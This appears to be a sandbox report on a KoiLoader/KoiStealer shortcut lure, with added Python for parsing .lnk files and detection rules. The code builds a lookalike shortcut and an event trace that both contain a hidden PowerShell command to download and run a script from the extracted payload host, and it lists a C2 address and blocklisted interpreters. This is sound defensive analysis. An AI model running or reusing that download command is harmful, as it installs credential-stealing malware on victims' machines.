General

  • Target

    bank_statement_04_2025.zip

  • Size

    809B

  • Sample

    250510-gsnzqavvcx

  • MD5

    0e441e5a6db5f30f438ec363a00a68f3

  • SHA1

    d6f39e006f6eb3a3e2e3df6d448950d1f9948c7b

  • SHA256

    3523653959c0083b7e106a71dd99acc03ccf09cb3452b9b65dcf17005917e389

  • SHA512

    c5c64274c4095b1d0bb3f3059949fd309c1c8b3eb386745e77cd7d5653a9f2ba93c50d7c42098b8c56d10ffb515b4fb1802ce269e6d1e075c80eb642c7d7c604
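The 809-byte archive above is the lure container; the Targets section below identifies its member as bank_statement_04_2025.lnk, a Windows shortcut that launches the PowerShell dropper. The parser that follows is an added example, not the sandbox's own code: it walks the MS-SHLLINK ShellLinkHeader, skips the optional IDList and LinkInfo structures, reads the StringData fields (relative path, working directory, command-line arguments, icon), and scores what it finds. The shortcut it builds to exercise itself is constructed for this example; its PowerShell command line, relative path and icon path are assumptions, only the download URL is the one the report extracted.

```python
import io
import re
import struct
import zipfile

# Constants from MS-SHLLINK 2.1 (ShellLinkHeader / LinkFlags)
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
# StringData fields appear in this fixed order, each only when its flag bit is set
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION)]
URL_RE = re.compile(r"https?://[^\s'\"<>;)]+")


def parse_lnk(data: bytes) -> dict:
    """Parse the header and StringData of a Shell Link; raise on malformed input."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_cmd = struct.unpack_from("<I", data, 60)[0]       # ShowCommand sits at header offset 60
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:                     # uint16 size, not counting itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                               # uint32 size, counting itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {"show_command": show_cmd}
    for name, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]      # CountCharacters, no terminator follows
        raw_len = count * 2 if unicode else count
        raw = data[pos + 2:pos + 2 + raw_len]
        if len(raw) != raw_len:
            raise ValueError(f"truncated {name}")
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252")
        pos += 2 + raw_len
    return fields


def assess(fields: dict) -> list:
    """Reasons a parsed shortcut looks like a script-launcher lure (heuristics, not signatures)."""
    target = (fields.get("relative_path", "") + " " + fields.get("arguments", "")).lower()
    reasons = []
    if re.search(r"powershell|pwsh|cmd\.exe|mshta|wscript|cscript", target):
        reasons.append("launches a script interpreter")
    if re.search(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl)\b", target):
        reasons.append("web request in arguments")
    if re.search(r"-w(indowstyle)?\s+h", target) or fields.get("show_command") == 7:
        reasons.append("window hidden or minimized")   # 7 = SW_SHOWMINNOACTIVE
    reasons += [f"url {u}" for u in URL_RE.findall(fields.get("arguments", ""))]
    return reasons


def triage_zip(zip_bytes: bytes) -> dict:
    """Parse every .lnk inside an archive and return {member name: assessment}."""
    out = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".lnk") and not info.is_dir():
                try:
                    out[info.filename] = assess(parse_lnk(zf.read(info)))
                except (ValueError, struct.error) as e:
                    out[info.filename] = [f"unparseable: {e}"]
    return out


def _s(text: str) -> bytes:
    """One UTF-16LE StringData field: CountCharacters followed by the characters."""
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_sample_lnk() -> bytes:
    """Constructed lookalike of the lure; the real bank_statement_04_2025.lnk is not reproduced here."""
    flags = (HAS_LINK_TARGET_ID_LIST | HAS_LINK_INFO | HAS_RELATIVE_PATH | HAS_WORKING_DIR
             | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE)
    header = (struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<II", flags, 0x80)
              + b"\x00" * 24                                   # three zero FILETIMEs
              + struct.pack("<IIIHHII", 0, 0, 7, 0, 0, 0, 0))  # FileSize, IconIndex, ShowCommand=7, HotKey, reserved
    id_list = struct.pack("<H", 2) + b"\x00\x00"               # IDList holding only the TerminalID
    link_info = struct.pack("<7I", 0x1C, 0x1C, 0, 0, 0, 0, 0)  # minimal LinkInfo, no volume or path
    args = r'-w hidden -nop -c "iwr https://www.wilkinsonbeane.com/css/slider -OutFile $env:TEMP\s.ps1; . $env:TEMP\s.ps1"'
    return (header + id_list + link_info
            + _s(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe")   # assumed target
            + _s(r"C:\Windows\System32") + _s(args)
            + _s(r"%SystemRoot%\System32\imageres.dll")                                 # assumed lure icon
            + struct.pack("<I", 0))                                                     # terminal ExtraData block


def build_sample_zip() -> bytes:
    """Wrap the constructed shortcut the way the 809-byte lure archive wraps the real one."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("bank_statement_04_2025.lnk", build_sample_lnk())
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in triage_zip(build_sample_zip()).items():
        print(member, "->", "; ".join(reasons))
```

Point triage_zip at the actual archive bytes to get the same assessment for the real member; parse_lnk deliberately stops before the ExtraData blocks, so environment-variable targets stored in an EnvironmentVariableDataBlock would need an extra pass.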

Malware Config

Extracted

  • Language

    ps1 (deobfuscated)

  • URLs

    exe.dropper: https://www.wilkinsonbeane.com/css/slider

Extracted

  • Family

    koiloader

  • C2

    http://185.62.56.10/trounced.php

  • Attributes

    payload_url: https://www.wilkinsonbeane.com/css/slider

Targets

    • Target

      bank_statement_04_2025.lnk

    • Size

      1KB

    • MD5

      a7727b666db4909929ecb590fae94ec8

    • SHA1

      8b203aaf632feb9c0ee7babe542e4a53457990ed

    • SHA256

      9e41baef8d2a8abc30a7e1dd1a946222b204d7d3183139cd793d1920c704e23d

    • SHA512

      165dfa130c3ee453b761788f0c727390f41d85c7f9d27331e5f68cbc7264f00f56b69e1099e82a95528a518d75c5a1b237e23111c2ee6f035b0a0bb9bb05417a

    • KoiLoader

      KoiLoader is a malware loader written in C++.

    • KoiStealer

      KoiStealer is an infostealer written in C#.

    • Koiloader family

    • Koistealer family

    • Detects KoiLoader payload

    • Detects KoiStealer payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      PowerShell Invoke-WebRequest.

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence check.

    • Indicator Removal: Clear Persistence

      Clears artifacts associated with previously established persistence, such as scheduled tasks, on the host.
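The behavioural signatures listed above (PowerShell web request, blocklisted process making a network request, registry country-code lookup, clearing of persistence artifacts) and the two extracted IOCs (the KoiLoader C2 and the payload URL) can be expressed as rules over a process, registry and network event stream. The rule set below is an added example, not the sandbox's signature engine. The trace it runs over is constructed for this example; the blocklist membership, the `sd.exe` process name and the assumption that the country-code lookup reads `Control Panel\International\Geo\Nation` (or `Geo\Name`) are mine, not taken from the report.

```python
import re
from urllib.parse import urlsplit

# IOCs extracted in the report above
KOILOADER_C2 = "http://185.62.56.10/trounced.php"
PAYLOAD_URL = "https://www.wilkinsonbeane.com/css/slider"
IOC_HOSTS = {urlsplit(KOILOADER_C2).hostname, urlsplit(PAYLOAD_URL).hostname}

# Assumed blocklist: interpreters and LOLBins that should not originate network traffic
BLOCKLISTED_NET = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                   "regsvr32.exe", "rundll32.exe", "certutil.exe"}
WEB_CMDLET_RE = re.compile(
    r"\b(iwr|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|start-bitstransfer)\b", re.I)
# Assumed registry location of the country code the "Checks computer location settings" signature refers to
GEO_KEY_RE = re.compile(r"\\control panel\\international\\geo\\(nation|name)$", re.I)
RUN_KEY_RE = re.compile(r"\\currentversion\\run(once)?\\", re.I)


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events: list) -> list:
    """Return (rule, event_index) hits for a list of trace events."""
    hits = []
    for i, ev in enumerate(events):
        kind = ev.get("type")
        img = image_name(ev.get("image", ""))
        if kind == "process":
            cmd = ev.get("cmdline", "")
            if img in ("powershell.exe", "pwsh.exe") and WEB_CMDLET_RE.search(cmd):
                hits.append(("powershell_web_request", i))
            if img == "schtasks.exe" and re.search(r"/delete\b", cmd, re.I):
                hits.append(("clear_persistence_schtasks", i))
        elif kind == "registry":
            key = ev.get("key", "")
            if ev.get("op") == "query" and GEO_KEY_RE.search(key):
                hits.append(("geofence_country_lookup", i))
            if ev.get("op") == "delete" and RUN_KEY_RE.search(key):
                hits.append(("clear_persistence_runkey", i))
        elif kind == "network":
            if img in BLOCKLISTED_NET:
                hits.append(("blocklisted_process_network", i))
            host = ev.get("host") or urlsplit(ev.get("url", "")).hostname
            if host in IOC_HOSTS:
                hits.append(("known_koiloader_ioc", i))
    return hits


# Constructed trace in the order the chain above would produce it; not the report's actual task log
SAMPLE_TRACE = [
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -c \"iwr https://www.wilkinsonbeane.com/css/slider -OutFile $env:TEMP\\s.ps1\""},
    {"type": "network", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "url": "https://www.wilkinsonbeane.com/css/slider"},
    {"type": "registry", "image": r"C:\Users\Public\sd.exe", "op": "query",
     "key": r"HKCU\Control Panel\International\Geo\Nation"},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /delete /tn "Updater" /f'},
    {"type": "network", "image": r"C:\Users\Public\sd.exe", "url": "http://185.62.56.10/trounced.php"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},  # benign control
]


if __name__ == "__main__":
    for rule, idx in evaluate(SAMPLE_TRACE):
        print(f"{rule:32} event {idx}: {SAMPLE_TRACE[idx]}")
```

The geofence rule keys on registry reads, which Sysmon does not record; it needs an API-trace or EDR source that logs RegQueryValue, which is why the sandbox can report it and a Run-key-only telemetry pipeline cannot.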

MITRE ATT&CK Enterprise v16

Tasks